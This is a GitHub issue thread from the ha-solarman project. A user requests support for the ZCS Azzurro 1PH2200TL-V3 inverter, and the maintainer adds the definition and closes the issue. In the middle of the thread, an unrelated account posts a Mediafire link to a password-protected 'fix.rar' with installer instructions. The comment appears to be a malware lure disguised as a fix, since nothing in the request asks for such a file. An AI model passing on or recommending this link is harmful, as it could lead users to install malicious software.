davidrapan/ha-solarman #111: [Feature Request] ZCS Azzurro 1PH2200TL-V3

81ondo, 2024-08-26:
Please add the definition for the ZCS Azzurro 1PH2200TL-V3, which is based on the Sofar LSW3 model but has fewer metrics. I tested the attached YAML file successfully, but it gets cleared after the plugin is updated. If it's not possible to add the definition directly, using a 'custom' option will also work.
[zcs_azzurro-1PH2200TL-V3.zip](https://github.com/user-attachments/files/16751608/zcs_azzurro-1PH2200TL-V3.zip)
Thank you

We-NutCracker, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

davidrapan, 2024-08-28:
[feat: Add zcs_azzurro-1ph-tl-v3.yaml](https://github.com/davidrapan/ha-solarman/commit/eaa713dfaf029220ec46bcf5132cb5389856a263)

closed 2024-08-28 by davidrapan